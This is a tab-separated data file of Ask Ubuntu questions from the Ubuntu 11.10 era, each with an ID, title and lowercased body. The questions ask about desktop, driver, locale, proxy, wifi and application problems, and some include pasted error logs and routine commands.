68084	get todays date and use it in filename	using the command-line , i want to create a log file with today 's date in the name ( for example , today is 05/17/2011 , so the filename would have to be log051711 ) . i know how to create the file ( touch filename ) , but i do n't know how to get today 's date . i have looked at the manual for date , but it seems that i ca n't really format its output ? any help would be appreciated . : )
68085	why am i having the most perfectly looking boot when i run from cd/usb but not from hd ?	i 've read the lot of topics on plymouth and nvidia drivers . however my question is focused on why the difference between live cd and installation ? by `` the perfectly looking boot '' i mean : the boot animation starts at the appropriate time ( immediately ) the bootscreen animation resolution matches my screen the transition between bootscreen and login/desktop is smooth i can start using my desktop with no lagging due to loading that is still being performed once i install ubuntu on my hard drive though , some or all of the 4 points above are not true . i 've been having this issues since i started using ubuntu extensively which was around version 10.04 .
68088	why wo n't banshee boot after an unexpected power outage ?	i was in the middle of rescanning my audio library on my desktop pc when the power was cut unexpectedly . my system seems to be fine overall except for banshee which throws up an error which i will post at the bottom of this question . i have uninstalled and reinstalled banshee to no effect and am unsure how to proceed other than find an alternate player , this would be possible but not favorable . an unhandled exception was thrown : document element did not appear . file : ///home/matt/.config/banshee-1/addin-db-001/config.xml line 1 , position 1. at mono.xml2.xmltextreader.read ( ) [ 0x00000 ] in < filename unknown > :0 at system.xml.xmltextreader.read ( ) [ 0x00000 ] in < filename unknown > :0 at mono.xml.entityresolvingxmlreader.read ( ) [ 0x00000 ] in < filename unknown > :0 at mono.xml.dtdvalidatingreader.readcontent ( ) [ 0x00000 ] in < filename unknown > :0 at mono.xml.dtdvalidatingreader.read ( ) [ 0x00000 ] in < filename unknown > :0 at mono.xml.schema.xsdvalidatingreader.read ( ) [ 0x00000 ] in < filename unknown > :0 at system.xml.xmlvalidatingreader.read ( ) [ 0x00000 ] in < filename unknown > :0 at system.xml.xmldocument.readnodecore ( system.xml.xmlreader reader ) [ 0x00000 ] in < filename unknown > :0 at system.xml.xmldocument.readnode ( system.xml.xmlreader reader ) [ 0x00000 ] in < filename unknown > :0 at system.xml.xmldocument.load ( system.xml.xmlreader xmlreader ) [ 0x00000 ] in < filename unknown > :0 at system.xml.xmldocument.load ( system.string filename ) [ 0x00000 ] in < filename unknown > :0 at mono.addins.database.databaseconfiguration.read ( system.string file ) [ 0x00000 ] in < filename unknown > :0 at mono.addins.database.addindatabase.get_configuration ( ) [ 0x00000 ] in < filename unknown > :0 at mono.addins.database.addindatabase.runpendinguninstalls ( iprogressstatus monitor ) [ 0x00000 ] in < filename unknown > :0 at mono.addins.database.addindatabase.update ( iprogressstatus monitor , system.string domain ) [ 0x00000 ] in < filename unknown > :0 at mono.addins.addinregistry.update ( iprogressstatus monitor ) [ 0x00000 ] in < filename unknown > :0 at banshee.servicestack.servicemanager.initializeaddins ( ) [ 0x00000 ] in < filename unknown > :0 at banshee.servicestack.servicemanager.defaultinitialize ( ) [ 0x00000 ] in < filename unknown > :0 at banshee.servicestack.application.initialize ( ) [ 0x00000 ] in < filename unknown > :0 at banshee.gui.gtkbaseclient.initialize ( boolean registercommonservices ) [ 0x00000 ] in < filename unknown > :0 at banshee.gui.gtkbaseclient..ctor ( boolean initializedefault , system.string defaulticonname ) [ 0x00000 ] in < filename unknown > :0 at banshee.gui.gtkbaseclient..ctor ( ) [ 0x00000 ] in < filename unknown > :0 at nereid.client..ctor ( ) [ 0x00000 ] in < filename unknown > :0 at ( wrapper managed-to-native ) system.reflection.monocmethod : internalinvoke ( system.reflection.monocmethod , object , object [ ] , system.exception & ) at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 exception has been thrown by the target of an invocation . at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 at system.reflection.monocmethod.invoke ( bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 at system.reflection.constructorinfo.invoke ( system.object [ ] parameters ) [ 0x00000 ] in < filename unknown > :0 at system.activator.createinstance ( system.type type , boolean nonpublic ) [ 0x00000 ] in < filename unknown > :0 at system.activator.createinstance ( system.type type ) [ 0x00000 ] in < filename unknown > :0 at banshee.gui.gtkbaseclient.startup ( ) [ 0x00000 ] in < filename unknown > :0 at hyena.gui.cleanroomstartup.startup ( hyena.gui.startupinvocationhandler startup ) [ 0x00000 ] in < filename unknown > :0 .net version : 4.0.30319.1 os version : unix 3.0.0.12 assembly version information : system.xml ( 4.0.0.0 ) banshee.core ( 2.2.0.0 ) hyena.data.sqlite ( 2.2.0.0 ) gdk-sharp ( 2.12.0.0 ) mono.addins ( 0.6.0.0 ) atk-sharp ( 2.12.0.0 ) hyena.gui ( 2.2.0.0 ) mono.posix ( 4.0.0.0 ) gtk-sharp ( 2.12.0.0 ) banshee.thickclient ( 2.2.0.0 ) nereid ( 2.2.0.0 ) dbus.proxies ( 0.0.0.0 ) system.core ( 4.0.0.0 ) hyena ( 2.2.0.0 ) dbus-sharp ( 1.0.0.0 ) glib-sharp ( 2.12.0.0 ) system ( 4.0.0.0 ) banshee.services ( 2.2.0.0 ) banshee ( 2.2.0.0 ) mscorlib ( 4.0.0.0 ) platform information : linux 3.0.0-12-generic x86_64 x86_64 gnu/linux disribution information : [ /etc/lsb-release ] distrib_id=ubuntu distrib_release=11.10 distrib_codename=oneiric distrib_description= '' ubuntu 11.10 '' [ /etc/debian_version ] wheezy/sid
68089	where to set proxy ignore list ?	i upgraded to ubuntu 11.10 from 11.04 , shocked to see few things ... my system is behind a proxy , so i did set a proxy setting . being a web developer , i want to remove a lot of addresses that i type in browser address bar to not hit proxy . there 's no such ignore list in ubuntu 11.10 , what/where do i do it ? what was the requirement to change the way network gui worked ?
68098	how can i change the volume icon in lubuntu 11.10 ?	i 've got a clean install of lubuntu 11.10 , with pulseaudio and pulseaudio-dbg installed . the thing that bothers me is the volume icon . i 've got a vol+ and vol- button on my keyboard that both work , but the volume icon wo n't show me the actual volume without hovering over it . and unlike changing the screen brightness , i wo n't get a popup showing the volume when changing it . is there any way to change the volume icon in lubuntu 11.10 , or at least make it show the actual volume ?
68099	unity does n't run after upgrading via xorg-edgers	after doing the xorg-edgers upgrade , i ca n't log into unity but i can access gnome 3 . any reasons why . the performance boost is amazing but i do n't want to go back to the old drivers . unity 2d works . compiz crashes and the following error is left in dmesg [ 530.302141 ] compiz [ 3247 ] general protection ip:7f038283bd30 sp:7fff81df2eb8 error:0 in libutouch-geis.so.1.2.0 [ 7f0382831000+17000 ]
68102	what 's the most lightweight application to mount iso files in lubuntu ?	i 'm looking for a lightweight way to mount iso 's on my fresh-install of lubuntu 11.10 . furius iso mount has been my favourite on ubuntu , but it installs too many extra stuff on lubuntu , like brasero . what would be the best choice ?
68106	empathy not working behind proxy	earlier i was using ubuntu 11.04 empathy 2.34.0 cntlm proxy server for gtalk and working fine with gnome network preference proxy server settings . recently i upgrade the ubuntu 11.10 empathy 3.2 cntlm proxy server but with latest configuration it is not connecting/ not working any clue ? please suggest thanks for the reply , settings mention in the thread were same for http_proxy . for cntlm proxy server i have not enabled socks5 . http_proxy = > 127.0.0.1 3128 use_http_proxy also check in . in proxy section proxy = > ftp_host , secure_host and socks_host - 127.0.0.1 ftp_port , secure_port and socks_port - 3128 where as i have not unable the socks5 of cntlm proxy server , will that be causing problem ? i also tried with socks5 enabling still its not working . empathy client trying to connect for long time no any message as well . debug log of empathy : mcd-debug : 10/27/2011 09:02:16.284081 : dbusprop_get_all : org.freedesktop.telepathy.accountmanager mcd-debug : 10/27/2011 09:02:16.320405 : get_valid_accounts : called mcd-debug : 10/27/2011 09:02:16.320707 : get_invalid_accounts : called mcd-debug : 10/27/2011 09:02:16.320720 : mcd_dbus_get_interfaces : called mcd-debug : 10/27/2011 09:02:17.18498 : _mcd_client_registry_found_name : registering client org.freedesktop.telepathy.client.empathy.chatroommanager._3a1_2e345.n0 mcd-debug : 10/27/2011 09:02:17.19711 : mcd_client_proxy_constructed : org.freedesktop.telepathy.client.empathy.chatroommanager._3a1_2e345.n0 mcd-debug : 10/27/2011 09:02:17.72814 : mcd_client_proxy_introspect : no .client file for org.freedesktop.telepathy.client.empathy.chatroommanager._3a1_2e345.n0 . ask on d-bus . mcd-debug : 10/27/2011 09:02:17.927040 : dbusprop_get_all : org.freedesktop.telepathy.accountmanager mcd-debug : 10/27/2011 09:02:17.927062 : get_valid_accounts : called mcd-debug : 10/27/2011 09:02:17.927088 : get_invalid_accounts : called mcd-debug : 10/27/2011 09:02:17.927098 : mcd_dbus_get_interfaces : called mcd-debug : 10/27/2011 09:02:18.109263 : _mcd_client_registry_found_name : registering client org.freedesktop.telepathy.client.empathy.callobserver mcd-debug : 10/27/2011 09:02:18.109400 : mcd_client_proxy_constructed : org.freedesktop.telepathy.client.empathy.callobserver mcd-debug : 10/27/2011 09:02:18.109770 : mcd_client_proxy_introspect : no .client file for org.freedesktop.telepathy.client.empathy.callobserver . ask on d-bus . mcd-debug : 10/27/2011 09:02:18.124634 : _mcd_client_registry_found_name : registering client org.freedesktop.telepathy.client.empathy.eventmanager mcd-debug : 10/27/2011 09:02:18.124743 : mcd_client_proxy_constructed : org.freedesktop.telepathy.client.empathy.eventmanager mcd-debug : 10/27/2011 09:02:18.124944 : mcd_client_proxy_introspect : no .client file for org.freedesktop.telepathy.client.empathy.eventmanager . ask on d-bus . mcd-debug : 10/27/2011 09:02:18.155111 : _mcd_client_registry_found_name : registering client org.freedesktop.telepathy.client.empathy.autheventmanager mcd-debug : 10/27/2011 09:02:18.155206 : mcd_client_proxy_constructed : org.freedesktop.telepathy.client.empathy.autheventmanager mcd-debug : 10/27/2011 09:02:18.155464 : mcd_client_proxy_introspect : no .client file for org.freedesktop.telepathy.client.empathy.autheventmanager . ask on d-bus . mcd-debug : 10/27/2011 09:02:18.225830 : dbusprop_get_all : org.freedesktop.telepathy.account mcd-debug : 10/27/2011 09:02:18.225846 : mcd_dbus_get_interfaces : called mcd-debug : 10/27/2011 09:02:18.225951 : mcd_dbus_get_interfaces : skipping inactive optional iface org.freedesktop.telepathy.account.interface.externalpasswordstorage.draft mcd-debug : 10/27/2011 09:02:18.226223 : _mcd_account_dup_parameters : called mcd-debug : 10/27/2011 09:02:18.227005 : get_connect_automatically : called for gabble/jabber/_2e_40gmail_2ecom0 mcd-debug : 10/27/2011 09:02:18.241396 : dbusprop_get_all : org.freedesktop.telepathy.account mcd-debug : 10/27/2011 09:02:18.241406 : mcd_dbus_get_interfaces : called mcd-debug : 10/27/2011 09:02:18.241417 : mcd_dbus_get_interfaces : skipping inactive optional iface org.freedesktop.telepathy.account.interface.externalpasswordstorage.draft mcd-debug : 10/27/2011 09:02:18.241451 : _mcd_account_dup_parameters : called mcd-debug : 10/27/2011 09:02:18.241511 : get_connect_automatically : called for salut/local_xmpp/account0 mcd-debug : 10/27/2011 09:02:18.854758 : dbusprop_get_all :
68107	how to switch applications/windows in 11.10 as in 11.04 ?	i just upgraded to ubuntu 11.10 . to switch among applications by alt+tab , it is a little bit different from ubuntu 11.04 . it groups same kind of windows , for instance it puts emacs into 1 icon , adobe reader in 1 icon . so when i have several windows of same kind , it is not easy to search for a specific one just by alt+tab . in 11.04 , it is much easier ... does anyone know how to overcome it ?
68113	how to delete the capture of window key ?	because i use virtualbox to run windows xp . normally when i press window key+e it can show file browser on xp , but now my virtualbox 's xp could n't capture window key . how to fix it ? thank you~
68115	output terminal redirect to zenity	let 's explain you my doubt . we all know that > & is shell syntax for `` fold a file descriptor into another '' . so 2 > & 1 means that i want to redirect stderr to the stdin , this is simple and clear : ) the thing that i do n't understand is this ( let explain it with an example ) ncftpput -u $ user -p $ pass $ host $ remote_dir $ local_file | zenity -- text-info -- title `` putting files ... '' -- width 600 -- height 300 the code above does n't works ... but this works perfectly : ncftpput -u $ user -p $ pass $ host $ remote_dir $ local_file 2 > & 1 | zenity -- text-info -- title `` putting files ... '' -- width 600 -- height 300 i do n't undestrand why if i put 2 > & 1 the redirection to zenity work and if i do n't write 2 > & 1 redirection does n't works . why ?
68119	calc formulas show up in english , how can i use them in my native language ?	i 'm a brazilian user and after update to ubuntu 11.10 , my libreoffice ( that here is called broffice ) is having some formulas in english and it has always being in portuguese . like sum always was soma , and so on .
68123	brasero is not writing discs	when i use brasero to write disks , it seems the recording occurs flawless , but , the disk is unreadable . xfburn is working well , but brasero not . i would like to use brasero , but it makes me waste disks . has someone seen this before ?
68126	problem with compiz profiles	i 've been struggling with this problem for the last few days . in oneiric compiz and unity do n't get along very well and on top of that i think there 's some problem with the compiz-gconf communication . here 's what 's happening - i 've had various bugs with defaulting options and profiles ( compiz and system settings - for ex . the launch terminal shortcut defaulted 2-3 times ) . last thing that happened - i configured compiz to use flat-file backend ( no gconf ) , it worked but on restart the edge-bindings ( expo , windows scale ) were n't working ( the expo only opened with binding and did n't close , so i figured the launcher could be the problem ) . as i feel i 'm just rambling lets get to the most persistent bug : when gconf backend is enabled in ccsm- > preferences it shows the profiles `` default '' and two more with names of invalid characters . the last two appeared after i imported my profile ( two times ) , i tried to erase them but with no success . i erased one of the profiles from the gconf ( compizconfig ) folder , but it still showed in ccsm . that 's all that i can think of for now , i hope the thread 's editable . ps : the directories in .gconf/ are compiz-1 and configcompiz-1 , why the `` -1 '' s ?
68127	how to switch language keyboard combination ?	i would like to type hebrew in ubuntu . i tried downloading the hebrew language pack and then setting alt-shift as my layout-change shortcut in the options section of `` keyboard layout '' . however , when i actually press alt-shift , nothing happens . how can i switch my keyboard layout to hebrew ?
68137	how do i manually add a printer , auto keeps detecting wrong printer	how can i manually change the model , when ubuntu detects printer , it detects the wrong drivers . the auto system keeps selecting olivetti when the driver must be kyocera fs-c5400dn . many thanks
68142	how do i install cinelerra ?	i need cinelerra for my video eediting in ubuntu but i cant install that . anybody can help me ?
68144	init process at 100 % cpu usage	i have a ubuntu x64 machine on a openvz vps account on a quadcore processor with 1gb/2gb ( burst ) . a few days ago i 've managed to successfully update it to 11.10 oneiric ocelot . there 's only one problem : my `` init '' process ( pid = 1 ) is at 100 % cpu usage , keeping one core 99.5 % of the time at full throttle . is there any solution to stop the strange init 's behavior ? can i trace what happens behind that init process to find out what makes it spike so high ?
68145	ubuntu one setup interrupted on windows 7	i was installing the ubuntu one client , for the first time , on my windows 7 machine but the process was interrupted before i could enter the sso validation . now , when i start the client and after i have entered my login , nothing happens . i get the following error : u ' [ my email address ] ' . please help , i would like to avoid having to create a new account .
68146	modelsim is not working after ubuntu 11.10 upgrade ?	i have the error when i tried to run the modelsim 6.6d and display this below and it was fine in previously 11.04 version error : can not find /home/mark/altera/11.0/modelsim_ase/bin/../linux_rh60/vlog the vlog should be in directory of /home/mark/altera/11.0/modelsim_ase/bin/vlog but , i do n't understand why is looking for linux_rh60/vlog ? has anyone seen this error before ?
68148	how to tell dash to re-scan apps ?	after changing my locale settings i 've found that all apps are gone from dash . how can i tell app lense to re-scan them ?
68151	how do i revert alt-tab behavior to switch between windows on the current workspace ?	enabling bias alt-tab sorting to prefer windows on the current viewport as described here made no difference . how can i get back the exact same behavior as 11.04 , so that alt-tab only switches between windows on the current workspace ? simply disabling the alt-tab and shift-alt-tab keybindings on the unity switcher seems to have helped , but it still switches workspaces on me sometimes . for example , if i give a terminal window focus then press alt-tab , it switches to another terminal window on any workspace before trying to switch on the same workspace . also , the unity switcher still shows up when i alt-tab then hold alt even though i removed its alt-tab keybinding .
68152	luks two-factor authentication	is it possible to create a crypted partition with a two-factor authentication ( decryption with password and keyfile ) with luks , like in truecrypt ?
68153	mouse stutters , but trackpad is smooth	on my dell latitude e6410 , several usb mice i tried are often `` stuttery '' , but the trackpad is always working fine . any ideas how to solve this issue ? thanks !
68154	how do i pin a manually installed executable to the gnome3 panel	i installed a binary application 'komodo edit 6 ' on my ubuntu 11.10 laptop . i 'm using the gnome 3 desktop environment and was wondering how i can pin the application to my favorites list in the panel . right now i have the application installed in a programs folder in my home directory . and there is a single start up script that i use to run the program . when i search for the application it returns the start-up script but when i click on it opens the file in gedit . so i need to run from the command line . this shows the application icon in the gnome panel but does n't actually allow me to pin the app there , only shows the title of the app window . i would like to just have an icon available to click and start the application .
68162	how do you disable/enable guest sessions in gui ?	i am wondering if there is a user friendly ( gui ) way to enable/disable the guest session . if not , is there a way to allow logged in users to create guest sessions , but not from the login screen . i am aware of this : if you 're using the default lightdm in ubuntu 11.10 , edit /etc/lightdm/lightdm.conf so that it looks like this : [ seatdefaults ] greeter-session=unity-greeter user-session=ubuntu allow-guest=false will this suit my fallback ?
68166	eliminate the top `` mac-ish '' file/edit/view/ ... menu after installing gnome ?	after getting gnome working and the panels moved back to the bottom where it 's finally usable again , and where i prefer them , the mac-style file/edit/view/.. menu remains on top . i 've tried the sudo apt-get remove indicator-appmenu appmenu-gtk and removing the dbus menu applet and the annoyance remains . any clues ?
68168	set lc_messages locale for all users	i have configured the /etc/default/locale file like : lang= '' es_es.utf-8 '' lc_all= lc_messages=posix lc_collate=c but when i enter in my gnome session the locales are : lang=es_es.utf-8 language=es_es : en lc_ctype= '' es_es.utf-8 '' lc_numeric= '' es_es.utf-8 '' lc_time= '' es_es.utf-8 '' lc_collate=c lc_monetary= '' es_es.utf-8 '' lc_messages= '' es_es.utf-8 '' lc_paper= '' es_es.utf-8 '' lc_name= '' es_es.utf-8 '' lc_address= '' es_es.utf-8 '' lc_telephone= '' es_es.utf-8 '' lc_measurement= '' es_es.utf-8 '' lc_identification= '' es_es.utf-8 '' lc_all= lc_collate is correct but lc_messages is set to es_es.utf-8 . in terminal console tty1 the locales are correct , so the problem is with gnome but i do n't know where to change this to be common to all users .
68173	why does n't the gnome tweak tool change the desktop fonts ?	i 've seen that the gnome tweak tool is not having any effect on the desktop fonts . and the only way to do it is gsettings set org.gnome.nautilus.desktop font 'ubuntu 10' which i read here how to change desktop font and font size why is this happening ? is it a bug ?
68175	how to create script with auto-complete ?	when i use program like svn and i type in gnome terminal : svn upd and hit tab it 's autocompleted to : svn update is it possible to do something like that in my custom bash script ?
68176	touchpad problem - shortly after login , it stops working	i 've ubuntu 11.10 and my problem is about the touchpad . at the beginning of my computer it 's works fine , but after opening an application or a few minutes , it stops working and i have to use a usb mouse . someone could help me ? thank you very much : )
68177	no sound on headphones on an asus k50ij	i 've tried the solution from 11.04 however it does n't seems to work . no matter what do i mute or unmute .
68179	how do i get a dlink dwa-130 working ?	i did a fresh install of ubuntu 11.10 in my system and i 'm having issue with my wireless usb adapter . i installed ndiswrapper in my system and load my .inf file for my usb wifi adapter and everything seems to be working fine but whenever i restart my system , my wifi stopped working and the wireless option in the network from system settings is missing . my quick fix to this is to remove the driver from ndiswrapper and install the .inf again . is there a way that ubuntu 11.10 automatically recognize the driver for my usb wifi adapter whenever i boot my system without removing and installing it from ndiswrapper ? i never had this issue with ubuntu 11.04 . please help !
68185	dual monitors behaving strangely with ati mobility radeon hd 3650	i recently installed ubuntu and intended to use my 1920x1080 monitor with my 1440 x 900 laptop via hdmi , however , when i went into system settings to extend the displays i got this error : the selected configuration for displays could not be applied requested position/size for crtc 147 is outside the allowed limit : position= ( 1920 , 180 ) , size= ( 1440 , 900 ) , maximum= ( 1920 , 1920 ) i tried installing the proprietary drivers for my graphics card , which is an ati mobility radeon hd 3650 and then changing my settings through the ati catalyst control center as one of the solutions online suggested , but this did not work . the strange thing is the 1920x1080 screen seems to display 2 bars accross the top with 2 sets of wifi status icons , battery/email etc . any help would be greatly appreciated as i love the way ubuntu looks and ca n't wait to begin learning more about this os .
68187	can i remove unity 2d safely ?	my computer can run unity 3d comfortably , and i do n't really want unity 2d as a fallback . can i remove it without breaking my system ?
68188	ubuntu 3d fails with nvidia	i 'm using ubuntu 11.10 . i was using 3d in 11.04 when i upgraded yesterday , but now it 's not working right ; windows does n't refresh unless i manually move them . i tried reinstalling the drivers for my nvidia 9800gtx , and even reinstalling ubuntu 11.10 , but i need to log in with unity 2d to get unity working nicely . any idea what might be wrong ?
68190	skype for linux	i am having problems trying to install skype on my sony vaio . i recently installed ubuntu on it and after the initial download i am unable to access the skype software . any advice on how to resolve this issue would be greatly appreciated .
68192	chromium extesions are broken	after upgrade ubuntu to 11.10 chormium does n't display extensions icons and extensions do n't work . how can i fix it ?
68194	how do i install the lubuntu software center ?	i 'd like to install the lubuntu software center on lubuntu 11.10 . here is the launchpad project , they have a ppa
68196	gnome 3 display problem	when i switch from ubuntu gui to gnome 3 , all the graphics look messed up . the task bar , the buttons ... .everything looks so gibberish and also the color scheme is messed up too .
68198	installing realtek 8188 wireless driver fails	when i try and install the rtl8188cus drivers downloaded from realtek ( using their install.sh shell script ) i installed the drivers in 11.04 using individual commands to make , etc. , and that worked ok , but using individual commands now gives the same error . what 's changed in 11.10 ? ? ? ? sudo bash install.sh ... all goes well until an error message appears authentication requested [ root ] for make driver : make arch=i386 cross_compile= -c /lib/modules/3.0.0-12-generic/build m=/home/karl/rtl8188cus/driver/rtl8192_8188cu_linux_v3.1.2590.20110922 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.0.0-12-generic ' cc [ m ] /home/karl/rtl8188cus/driver/rtl8192_8188cu_linux_v3.1.2590.20110922/core/rtw_cmd.o in file included from /home/karl/rtl8188cus/driver/rtl8192_8188cu_linux_v3.1.2590.20110922/core/rtw_cmd.c:24:0 : /home/karl/rtl8188cus/driver/rtl8192_8188cu_linux_v3.1.2590.20110922/include/osdep_service.h:49:29 : fatal error : linux/smp_lock.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /home/karl/rtl8188cus/driver/rtl8192_8188cu_linux_v3.1.2590.20110922/core/rtw_cmd.o ] error 1 make [ 1 ] : *** [ _module_/home/karl/rtl8188cus/driver/rtl8192_8188cu_linux_v3.1.2590.20110922 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.0.0-12-generic ' make : *** [ modules ] error 2 compile make driver error : 2 , please check error mesg thanks , fossfreedom , for your attention . i did a completely fresh install of ubuntu 11.10 . i then followed the troubleshooting pages for wireless networking and found that the realtek rtl8192cu driver was in the library , and used modprob ( i think ) to enable it as directed . it is associated with the realtek usb adaptor in network manager , and one can see the available wireless networks ( so i know its working to some extent ) . when i attempt to connect to my wifi network , it prompts for the wep code and tries and tries to connect . when it times out , it prompts for the code again . i have stuck in an old broadcom usb dongle , which connects happily using the wep code . so , my current guess is that it is a driver problem . do i report a bug to ubuntu , as it is part of the delivered ver 11.10 ? or to realtek ? thanks for your reply , fossfreedom i tried using uppercase for the wep passphrase and also for the hex wep code , to no effect . i have tried disablng wep encryption on the router , and still the old buffalo connects and the realtek fails to connect ... it seems slow also in recognising that the network is unencrypted ( does n't have the padlock on the little icon . i will see about posting a bug with ubuntu : i 've asked the manufacturer to check with realtek . any further advice welcomed .
68199	update errors : 404 , `` e : unable to parse package file ``	whenever i try to install or update anythin in ubuntu 11.10 i am getting this list of errors . some restricted , universal and main packages show the result failed to fetch or 404 error or check your internet connection . i have updated several times but the problem persists.do i have to add / remove something from my source list please help . this is the list of errors i am getting . http : //pastebin.com/lfgxzphv this is my source list http : //pastebin.com/4njwrqvp i changed the server so now only one errors remains e : unable to parse package fileâ /var/lib/apt/lists/partial/mirror.cse.iitk.ac.in_ubuntu_dists_oneiric-security_multiverse_i18n_index ( 1 ) where mirror.cse.iitk.ac.in is the new mirror i am using .
68201	unity launcher buttons size 11.10 on samsung netbooks	i 've followed all the instructions in the previous questions and the size ( obtrusively enormous btw ) of the icons does n't change . what else do i need to enable/disable . it seems to a shame to switch off unity but it seems designed to be difficult to modify . this problem seems to exist in samsung netbooks , and does not respond to changes made in ccsm , confity or gconf .
68205	gnome shell interface not working anymore after nvidia x server settings changes	i installed ubuntu 11.10 two days ago and at the same time installed gnome-shell ( unity just does n't feel right for me ) . everything was working fine until this morning , when logging in my session i found that the interface of gnome shell just was n't here anymore . i can see my desktop , but instead of the usual notification bar on the top of the screen i only have the equivalent of the right-click menu on the desktop . the key `` super '' does n't do anything and actually nothing works properly . i do n't know if this is related ( must be ) but i did some changes in the nvidia xserver settings . but i did a backup of the xorg.conf file , and even reverting to it does n't solve my problems ... any ideas ?
68208	ntfsprogs uninstalled ntfs-3g package	after installing ntfsprogs package , the package uninstalls ntfs-3g thus i ca n't mount my ntfs partitions through fstab i have this line in /etc/fstab that obviously does not work uuid=6b3962a91560c093 /media/data ntfs-3g defaults 0 0 also this line does not work uuid=6b3962a91560c093 /media/data fuse.ntfs locale=es_es.utf8 0 0 any workaround ? thanks a lot !
68209	where can i find a ppd file for a laserjet 1005 ?	i would like to install my hp laserjet 1005 ( in ubuntu 11.10 ) , which is old , yet very solid laser printer . however , there are no hplip component ( ppd ) for my printer . q1 : can i use a ppd file from another ( previous ) hplip release ? if the answer is yes , q2 : where can i find a specific ppd file for my laser printer ? thank you in advance for hints and answers : )
68212	dropbox crashes nautilus	i updated to oneric ocelot finally , and decided to make the leap to unity , but dropbox is choking nautilus . when i log in to 3d , i get a message saying that nautilus needs to be restarted in order for dropbox to function properly , but clicking the `` restart nautilus '' button does nothing . i can close the alert but nautilus does n't seem to be running . when i log in to unity 2d ( not even sure what that is ) nautilus seems to load but if i try to open the dropbox directory it chokes . i ca n't launch nautilus manually in unity 3d ( i get a `` segmentation fault '' error ) , though i can in 2d .
68214	cut/paste stopped working in xterm ( & uxterm ) after upgrading to 11.10	i seem to no longer be able to copy text , ( eg ; from a web page ; `` sudo apt-get remove appmenu-gtk3 appmenu-gtk appmenu-q '' ) and paste it into a terminal window . right click ( and alt-rt click , ctrl-rt-click ) , only highlights sections of the terminal window of gives me the `` minimize , ... ... '' menu w/o a copy or paste option listed . it worked fine pre 11.0.. clue ? thanks in advance ...
68218	unity dash home menu editor	i did fresh install to 11.10 and i am unable to find a menu editor . please do not post methods offered by 11.04 as none of them work . this question goes for the 11.10 users who made a fresh install and found an answer . what i need to do is create a custom menu entry for many aplications .
68219	how do i enable alt + middle mouse button window resizing in xubuntu ?	as of the 11.10 release i 've switched from vanilla ubuntu to xubuntu for a plethora of reasons . thus far i 'm loving xfce and have nearly everything configured the way i like it . the one thing that 's still got me stumped is alt + middle mouse button window resizing . how do i accomplish this in xubuntu/xfce ?
68220	system wo n't boot with nvidia driver enabled	i just tried to upgrade ubuntu 11.04 to 11.10 , but without success . i took a picture of what the screen are showing when i try to boot : if i use recovery mode - > resume , it works . normal boot without the nvidia driver works . does anyone know how to fix this ? : ) ( asus p8p67 , gigabyte geforce gtx 560 ti soc ) bug report on launchpad same problem posted here with log files ubuntuforum
68223	why did show desktop icon go away and how do i get it back ?	so first the rant.. i do n't understand how you can release an operating system without a show desktop icon installed by default . it is extremely annoying to a lot of users , especially new ubuntu adopters . i honestly had n't noticed since i use the keyboard shortcut ( which also keeps being switched between super+d and alt+ctrl+d ) but people i have convinced to use ubuntu are really pissed off since they have to minimize all the windows to access the desktop - and i can understand them . and no , they are not interested in keyboard shortcuts they will not remember . that being said the worst thing seems to be there is no fix for this that i can find ! webupd8 posted the following post . the solution that 's suggested there is quite frankly worse than nothing for people without the ability to middle click ( many mice/keyboard does n't have a middle button ) . i was so frustrated with it i deleted it after a few days . it 's not only the 10 second wait , even after waiting it does n't work properly . any ideas on how to win this confidence back from new ubuntu users ?
68226	frequent disconnects using wlan ar9285	i 'm getting a large number of disconnects from my wireless when i switched to oneiric server ( i did not see these happen with oneiric desktop ) from my ar9285 wireless lan device . here is the syslog snippet : oct 17 09:43:17 weather kernel : [ 1537.329138 ] wlan0 : deauthenticated from 00:12:17:7a:8e:42 ( reason : 7 ) oct 17 09:43:17 weather kernel : [ 1537.340409 ] cfg80211 : all devices are disconnected , going to restore regulatory settings oct 17 09:43:17 weather kernel : [ 1537.340423 ] cfg80211 : restoring regulatory settings oct 17 09:43:17 weather kernel : [ 1537.340435 ] cfg80211 : calling crda to update world regulatory domain oct 17 09:43:17 weather kernel : [ 1537.348571 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain oct 17 09:43:17 weather kernel : [ 1537.348581 ] cfg80211 : world regulatory domain updated : oct 17 09:43:17 weather kernel : [ 1537.348586 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) oct 17 09:43:17 weather kernel : [ 1537.348594 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) oct 17 09:43:17 weather kernel : [ 1537.348600 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) oct 17 09:43:17 weather kernel : [ 1537.348607 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) oct 17 09:43:17 weather kernel : [ 1537.348613 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) oct 17 09:43:17 weather kernel : [ 1537.348620 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) here is the relevant lspci output : # lspci | grep atheros 02:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) i have done quite a bit of searching and saw discussions for previous versions of ubuntu that recommended installing the linux-backports-modules package . however , this does not appear to be available for oneiric ( just the headers are listed as a package ) . any advice on how to achieve a stable wireless connection for this server ? it 's location mitigates against using a wired connection .
